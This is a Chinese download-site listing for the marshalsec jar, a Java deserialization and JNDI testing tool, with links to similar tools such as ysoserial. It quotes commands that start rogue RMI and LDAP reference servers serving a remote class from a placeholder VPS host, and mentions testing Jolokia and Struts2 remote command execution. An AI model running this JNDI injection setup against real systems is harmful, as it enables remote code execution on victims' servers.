Advertisement

marshalsec-0.0.3-SNAPSHOT-all.jar文件包。

  •  5星
  •     浏览量: 0
  •     大小:None
  •      文件类型:None

简介:
Moritz Bechler开发的这款工具,其源代码托管于 GitHub 仓库:https://github.com/mbechler/marshalsec。为了方便用户的使用,该工具提供了 Maven 构建方式,它是一个编译好的 JAR 包,能够帮助那些没有本地编译环境的开发者轻松启动 LDAP 和 RMI 服务。具体的操作步骤包括使用 Java 命令,通过指定 classpath marshalsec-0.0.3-SNAPSHOT-all.jar 运行 marshalsec.jndi.RMIRefServer 类,并配置目标地址为 http://VPS/ExportObject 端口 1099。同时,为了启动 LDAP 服务,也需要使用 Java 命令和 marshalsec.jndi.LDAPRefServer 类,配置目标地址为 http://VPS/ExportObject 端口 1389。我个人利用此工具进行测试,主要验证了 Spring Boot Jolokia 的远程命令执行功能以及 Struts2 S 系列漏洞的可利用性。

全部评论 (0)

还没有任何评论哟~
客服
客服
客服关闭
  • marshalsec-0.0.3-SNAPSHOT-all.jar
    优质
    marshalsec-0.0.3-SNAPSHOT-all.jar是一款用于测试和研究Java远程方法调用(RMI)及其它基于对象的协议安全性的工具包,包含多种恶意和服务模式。 Moritz Bechler编写了一个工具,源码可以从GitHub下载。使用Maven编译后得到一个jar包,方便那些没有编译环境的用户直接运行该jar包来开启RMI或LDAP服务。 要启动RMI服务,请执行以下命令: ``` java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://VPS/ExportObject 1099 ``` 要启动LDAP服务,请使用如下命令: ``` java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS/ExportObject 1389 ``` 这个工具可以用来测试Spring Boot Jolokia的远程命令执行,也可以用于检测Struts2 S系列漏洞。
  • marshalsec-0.0.3-SNAPSHOT-all.jar
    优质
    marshalsec-0.0.3-SNAPSHOT-all.jar是一款用于网络安全研究和测试的应用程序jar包,包含多种服务模拟器,主要用于检验远程对象序列化相关的安全漏洞。 marshalsec 官方不提供 jar 包下载,编译过程中遇到了一些错误,但我最终成功完成了编译。如果有需要的朋友可以使用我编译好的版本。
  • ysoserial-0.0.6-SNAPSHOT-all.jar
    优质
    ysoserial-0.0.6-SNAPSHOT-all.jar是一款用于生成各种常用Java反序列化漏洞利用链的工具包,帮助安全研究人员测试应用系统的反序列化风险。 ysoserial-0.0.6 可自行下载编译。提供一个下载链接:https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-gb617b7b-16/ysoserial-master-v0.0.5-gb617b7b-16.jar 重写后: ysoserial-0.0.6 可自行下载编译。
  • ysoserial-0.0.6-SNAPSHOT-all.jar
    优质
    ysoserial-0.0.6-SNAPSHOT-all.jar是一款用于生成各种常见Java反序列化漏洞利用链码的工具,帮助安全研究人员测试应用系统对Java反序列化的安全性。 ysoserial-0.0.6-SNAPSHOT-all.jar是一款工具jar包。
  • ysoserial-0.0.6-SNAPSHOT-all.jar
    优质
    ysoserial-0.0.6-SNAPSHOT-all.jar是一款用于创建利用Java反序列化漏洞的payload的工具集,主要用于安全测试和研究。 ysoserial-0.0.6-SNAPSHOT-all.jar
  • JNDI-Injection-Vulnerability-1.0-SNAPSHOT-all.jar
    优质
    JNDI-Injection-Vulnerability-1.0-SNAPSHOT-all.jar是一个用于演示和测试JNDI注入漏洞的Java应用程序jar包,帮助开发者理解并防范此类安全风险。 JNDI(Java Naming and Directory Interface)是Java平台提供的一种服务,用于访问目录和命名工件。它允许应用程序通过统一且标准的方式查找并使用各种资源和服务,如数据库连接、远程对象和其他类型的资源。JNDI 提供了一种与特定实现无关的方法来定位这些资源,并为 Java 应用程序提供了强大的工具以简化管理和配置过程。
  • 新版ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
    优质
    ysoserial是一款用于生成各种序列化对象以进行安全测试和研究的工具。此版本(0.0.6-SNAPSHOT-BETA)为开发者提供了最新的功能更新与漏洞利用示例,助力于深入探索Java反序列化的安全性问题。 GitHub上的文件已经很难下载了,作者已将文件上传到其他平台。我在使用过程中遇到了一些问题,在正确更改原文件名后才能正常使用。
  • Snort规则 snortrules-snapshot-2.8.tar.gz/snortrules-snapshot-2970...
    优质
    这段内容是Snort入侵检测系统的规则文件集合,版本为2.8及之后的更新版本,包含各种安全威胁的检测规则。 Snort规则主要分为两大类:一类是包含在snortrules-snapshot-2.8.tar.gz文件中的规则集;另一类则是包含在snortrules-snapshot-2970.tar.gz文件中的规则集。
  • HKDF-0.0.3.tar.gz
    优质
    HKDF-0.0.3.tar.gz 是一个包含 HMAC-based Key Derivation Function (基于HMAC的密钥导出函数) 版本为0.0.3 的源代码文件,适用于需要安全密钥生成和管理的应用程序。 HKDF(基于HMAC的提取与扩展密钥派生函数)是一种从原始密钥材料中抽取并生成安全密钥的技术手段,在密码学领域广泛应用。在Python环境中实现该功能的一个便捷库是hkdf-0.0.3,它提供了简洁易用的接口。 HKDF过程由两步组成:提取和扩展。首先通过HMAC等伪随机函数从原始输入材料中抽取一个安全密钥;这个步骤可以消除初始密钥中的任何弱随机性或结构化信息,确保生成的安全性。接着使用该安全密钥来产生特定长度的子密钥序列,以保证其独立性和不可预测性。 在hkdf-0.0.3库的应用中,开发者可以通过导入相关模块并调用HKDF函数实现上述操作。例如: ```python import hkdf # 假设ikm是原始输入材料;salt和info为额外参数 ikm = bsecret key material salt = bsalt info = bapplication specific info key = hkdf.HKDF(salt, ikm, info, output_length=32) ``` 这里的`output_length`指定了希望生成的密钥长度,单位为字节。函数将根据该参数输出相应大小的安全密钥。 值得注意的是,hkdf-0.0.3库依赖于Python内置的hmac模块,后者实现了HMAC算法;这是一套结合了哈希运算和密钥的消息认证码技术,在确保数据完整性和来源验证方面表现出色。实际应用中,HKDF常用于网络通信中的密钥交换、密码存储中的密钥派生以及加密算法所需的密钥生成等多个场景。 综上所述,hkdf-0.0.3是一个专为Python设计的高效实现库,它结合了HMAC的强大功能和灵活性,在从有限输入材料中安全地抽取并扩展出多个独立密钥方面表现出色。
  • Apoc-3.5.0.13-all.jar
    优质
    Apoc-3.5.0.13-all.jar是一款专为图数据库Neo4j设计的插件包,内含多种高级功能与算法,用于增强数据处理和分析能力。 apoc-3.5.0.13-all.jar